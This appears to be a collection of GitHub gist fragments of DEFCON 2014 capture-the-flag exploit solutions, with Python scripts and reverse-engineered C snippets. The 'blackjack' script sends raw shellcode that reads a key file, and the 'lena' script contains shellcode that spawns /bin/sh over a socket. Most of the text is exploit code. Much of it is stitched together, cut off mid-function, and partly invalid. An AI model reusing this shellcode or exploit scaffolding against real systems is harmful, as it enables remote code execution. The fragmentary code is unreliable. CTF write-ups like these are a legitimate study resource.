
#-*- encoding:utf-8 -*-
from base64 import b64encode, b64decode
from pickle import dumps, loads
from struct import pack, unpack
# Small integer codes. What each one stands for is not shown in this preview
# (the names suggest "no value" plus three colours) -- TODO confirm against
# the code that reads them.
NONE, WHITE, RED, BLUE = -1, 1, 2, 3
potetisensei / solve.py
Created February 15, 2014 14:03
DEFCON Writeup blackjack
from socket import *
# Raw byte string that the author names "shellcode"; it is sent unchanged to
# the service further down. The bytes are not disassembled in this comment;
# the only readable part is the trailing ASCII text "key".
shellcode = '\xeb)j\x05X[1\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf91\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2j\x04X\x8a\\$\x04\xcd\x80j\x01XC\xcd\x80\xe8\xd2\xff\xff\xffkey'
# Newline-separated mix of numbers and the letters H / S, ending in -1.
# Not used in the lines visible here -- presumably inputs sent later in the
# script; TODO confirm against the full file.
codes = '85\nH\nS\n95\nS\n125\nH\n17\nS\n109\nS\n125\nH\nH\nH\n57\nH\nH\n1\nH\nS\n1\nH\nH\nH\n25\nH\n-1'
# Plain TCP client socket.
t = socket(AF_INET, SOCK_STREAM)
# Hard-coded RFC 1918 (private) address and port: presumably a local copy of
# the challenge service, so this line must be edited before the script runs
# anywhere else.
t.connect(("192.168.174.187", 6789))
# Python 2 print statement: show whatever the service sends first
# (at most 2048 bytes).
print t.recv(2048)
# First message: the four bytes "0\x00\x00\x00", then the payload, then a
# newline. sendall() retries until every byte is written or an error occurs.
t.sendall("0\x00\x00\x00" + shellcode + "\n")
potetisensei / solve.py
Created February 16, 2014 07:52
DEFCON Writeup annyong
import sys
sys.path.append("/home/poteti/pwntools/")
from pwn import process
from struct import pack, unpack
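def read_addr_packed(packed_addr):
    """Decode a little-endian address of at most 8 bytes into an integer.

    Leaked pointers are often shorter than 8 bytes because the high zero
    bytes are cut off by string handling, so the input is right-padded with
    NUL bytes up to the width of an unsigned 64-bit value before unpacking.

    Args:
        packed_addr: byte string of length 0..8 holding the low-order bytes
            of the address first.

    Returns:
        The address as a non-negative integer.

    Raises:
        struct.error: if ``packed_addr`` is longer than 8 bytes (padding is
            then a no-op and the buffer does not match the "<Q" format).
    """
    # A bytes literal is used for the fill byte: on Python 2 it is the same
    # type as "\x00", and on Python 3 it lets the function accept the bytes
    # objects that sockets and pipes return (a str pad could not be joined
    # to them).
    padded = packed_addr.ljust(8, b"\x00")
    return unpack("<Q", padded)[0]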
potetisensei / sis.c
Created February 16, 2014 12:06
DEFCON Writeup incest
int main(int argc, char *argv[]) {
int p;
int netfd;
int filefd;
signal(SIGALRM, quitter);
alarm(0x0F);
netfd = atoi(argv[2]);
filefd = atoi(argv[1]);
potetisensei / penser.c
Last active August 29, 2015 13:56
DEFCON Writeup penser
/*
 * Guarded wrapper around recv(2).
 *
 * Returns -1 when buf is NULL, 0 when size is 0, and otherwise whatever a
 * single recv(fd, buf, size, 0) call returns (bytes read, 0, or -1).
 *
 * NOTE(review): size is a signed int while recv() takes a size_t length.
 * A negative size is not rejected here and would be converted to a very
 * large length, so callers must guarantee 0 <= size <= capacity of buf.
 * One call may also return fewer bytes than requested.
 */
int recv_fd(int fd, void *buf, int size) {
    ssize_t got;

    if (!buf) {
        return -1;
    }
    if (!size) {
        return 0;
    }

    got = recv(fd, buf, size, 0);
    return got;
}
int send_fd(int fd, void *buf, int size) {
int i = 0;
class ECCDecodeDataStream {
public:
uint var_4[0x20];
uint var_84;
uint var_88;
uint *var_8C;
uint var_90;
uint var_94;
uint var_98;
uint var_9C;
potetisensei / solve.py
Created March 28, 2014 05:08
DEFCON Writeup lena
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack
# Byte-string payload that the author names "shellcode", split by list() into
# one-character strings so single positions can be indexed. The bytes are not
# disassembled in this comment; the literal visibly contains the text pieces
# "//sh" and "/bin". How the list is consumed is not visible in this preview.
shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
# Reed-Solomon codec from the third-party reedsolo package; the argument is
# the number of error-correction symbols added per block.
rs = RSCodec(17)
# Empty accumulator; presumably filled with the encoded payload later in the
# file -- TODO confirm, the code that writes it is not visible here.
encoded_shellcode = ""
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
/* File-scope integer. Nothing in this preview shows how it is updated; the
 * name suggests the most recent pseudo-random value -- unconfirmed. */
int lastrand;
/* File-scope pointer to a function returning void, declared with an
 * unspecified parameter list.
 * NOTE(review): a writable global function pointer is an indirect-call
 * target, so every write to it deserves auditing; where it is assigned and
 * called is not visible in this preview. */
void (*exit_func)();
void do_exit(int arg_0)
{
potetisensei / solve.py
Created May 19, 2014 13:16
DEFCON 2014 Writeup heap
from struct import pack
from socket import *
from pwn import process
# Nine integer constants. The name suggests per-chunk heap values, but how
# they are used is not visible in this preview -- TODO confirm.
chunk_data_list = [0x00000379,0x000004e8,0x00000421,0x00000489,0x00000421,0x00000429,0x00000391,0x00000379,0x00000341]
# Plain TCP client socket.
p = socket(AF_INET, SOCK_STREAM)
# Hard-coded hostname and port of the remote challenge service; the name is
# resolved through DNS when connect() runs.
p.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
# Disabled alternative: drive a local ./heap binary through pwntools'
# process() instead of the network socket.
#p = process("./heap")
potetisensei / memo.c
Created May 19, 2014 13:28
shitsco incomplete
/* File-scope integer. The name suggests a permission or privilege flag, but
 * no read or write of it is visible in this preview -- TODO confirm. The
 * trailing comment only repeats the identifier. */
int global_permission; /* global_permission */
int sub_8048C30(int fd, char *buf, int size, char splitter) {
char tmp_buf[]; /* var_1D */
unsigned int ind = 0; /* register ebx */
if (size <= 0) return ind;
while (1) {
if (read(fd, tmp_buf, 1) <= 0) return -1;